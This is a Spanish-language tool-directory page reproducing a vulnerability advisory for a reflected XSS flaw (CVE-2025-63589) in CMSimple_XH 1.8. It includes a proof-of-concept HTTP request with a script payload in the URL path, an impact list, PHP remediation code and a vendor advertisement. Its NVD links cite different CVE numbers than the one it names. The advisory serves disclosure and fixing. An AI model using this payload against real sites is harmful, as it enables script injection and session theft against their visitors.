Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-63589 — Prueba de concepto de XSS reflejado para CMSimple_XH 1.8 con inyección de script no autenticada a través de segmentos de ruta no saneados, incluyendo puntuación CVSS 6.1 y ejemplo de remediación en PHP. | Kitploit
Herramientas/GitHubGitHub/cybercrewinc/cve-2025-63589
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubcybercrewinc/cve-2025-63589

CVE-2025-63589

Prueba de concepto de XSS reflejado para CMSimple_XH 1.8 con inyección de script no autenticada a través de segmentos de ruta no saneados, incluyendo puntuación CVSS 6.1 y ejemplo de remediación en PHP.

Ver Repositorio
1hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-63589 XSS Reflejado en el manejo de rutas de index.php de CMSimple_XH

Descubierto: 6 de octubre de 2025
Productos: CMSimple_XH (CMS de archivo plano de código abierto)
Versiones afectadas: 1.8
CVE(s): CVE-2025-63589 Autenticación requerida: Ninguna (sin autenticar)
Tipo de ataque: Cross-Site Scripting Reflejado (XSS)
CVSS v3.1 estimado: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medio)

El controlador frontal en index.php acepta segmentos de ruta dinámicos (utilizados para enrutar a plantillas/páginas) y pasa esos valores a la representación de la plantilla. El código no sanitiza ni codifica correctamente en HTML estos segmentos de ruta antes de insertarlos en atributos y enlaces href. Como resultado, una URI de solicitud especialmente diseñada que contenga caracteres como "> y etiquetas inyectadas (p. ej. <script>...</script>) se refleja textualmente en la salida HTML y el navegador la ejecuta.

Los puntos de reflexión típicos incluyen:

  • Atributos action de formularios (p. ej., formularios de inicio de sesión/búsqueda)
  • Atributos href de elementos de navegación/menú
  • Navegación de migas de pan / localizador (<nav class="locator">)
  • Enlaces de pie de página (Print view, Sitemap, Login, etc.)

Debido a que la entrada termina dentro de contextos de atributos HTML y contenido de anclaje, se requiere codificación estándar de atributos, pero falta.

Prueba de concepto (PoC)

Solicitud:

root@kitploit:~
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32

search=Search...&function=search
Pasted image 20251006203832

Respuesta:

Pasted image 20251006203959
Pasted image 20251006204254

La carga útil inyectada gjtqw"><script>alert(1)</script>co2cu se refleja sin codificar en enlaces de menú, migas de pan, acción del formulario de búsqueda y enlaces de pie de página, lo que provoca la ejecución del script al renderizar la página.

Ejemplo PHP sugerido para generar de forma segura un atributo action:

root@kitploit:~
$safe_segment = rawurlencode($segment);              // seguridad de ruta
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';

Impacto

  • Ejecución de código del lado del cliente (ejecutar JS arbitrario en los navegadores de las víctimas)
  • Divulgación de información (leer DOM, exfiltrar cookies/tokens accesibles al cliente)
  • Secuestro de sesión / suplantación de identidad si los tokens de sesión son accesibles para JS (no HttpOnly)
  • Suplantación de interfaz / phishing (mostrar avisos de inicio de sesión falsos o páginas falsas)
  • Acciones forzadas realizadas usando la sesión autenticada de la víctima

Créditos

CVE asignado: CVE-2025-63589

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

Descubridor: 株式会社CyberCrew / サイバークル

Referencias

https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php

https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ Contacto

Si tiene preguntas o consultas, no dude en contactarnos.


🏢 Corporación CyberCrew

G1@4x

📞 Tel: 03-6853-5823
📧 Correo electrónico: [email protected]


📄 Información de la empresa

ElementoContenido
Nombre de la empresaCorporación CyberCrew
Dirección1-18-13 Sotokanda, Chiyoda-ku, Tokio, Edificio Akihabara Dai, 6.º piso

🔐 Servicios principales

🛡️ Diagnóstico de seguridad y evaluación de riesgos

Analizamos las vulnerabilidades de la organización desde múltiples perspectivas y proponemos las mejores medidas correctivas.

💻 Pruebas de penetración

Cubrimos pruebas dirigidas, basadas en escenarios y pruebas de penetración LLM.

🌒 Monitoreo de la dark web

Detectamos tempranamente la filtración de información confidencial y respondemos rápidamente.

🎯 Ejercicios de equipo RED e ingeniería social

Evaluamos la capacidad de defensa basándonos en escenarios de ataque prácticos.

🧠 Diseño de sistemas seguros y consultoría

Apoyamos el diseño con seguridad considerada desde las primeras etapas del desarrollo.


🌐 Sitio web oficial: https://www.cybercrew.co.jp
🕒 CyberCrew — Su socio de confianza en seguridad.

Descargar herramienta